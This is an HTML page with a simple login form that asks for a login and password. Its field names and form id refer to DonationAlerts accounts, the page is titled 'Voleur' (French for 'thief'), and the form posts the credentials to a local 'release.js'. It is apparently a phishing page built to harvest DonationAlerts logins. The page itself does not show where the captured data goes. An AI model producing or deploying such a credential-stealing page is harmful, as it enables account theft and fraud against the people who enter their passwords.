<head>
    <style>
        form{
            height: 200px;
            width: 200px;
        }
        form table{
            display: block;
            margin-left: auto;
            margin-right: auto;
        }
        input{
            outline: 0;
            color: black;
            border: 2px solid navajowhite;
        }
        input[type=text],
        input[type=password]{
            width: 100px;
        }
        input:focus{
            border: 2px solid black;
        }
        h1,h3{
            text-align: center;
        }
    </style>

</head>
<form target="_blank" method="post" action="release.js"id="login_donationalerts_form">
    <table>
        <h1>Voleur</h1>
        <h3>Please sign in</h3>
        <tr><td>Login: </td><td><input type="text" name="donationsalerts_login"></td></tr>
        <tr><td>Password: </td><td><input type="password" name="donationalerts_password"></td></tr>
        <tr><td><input type="submit" value="log in"></td></tr>
    </table>
</form>
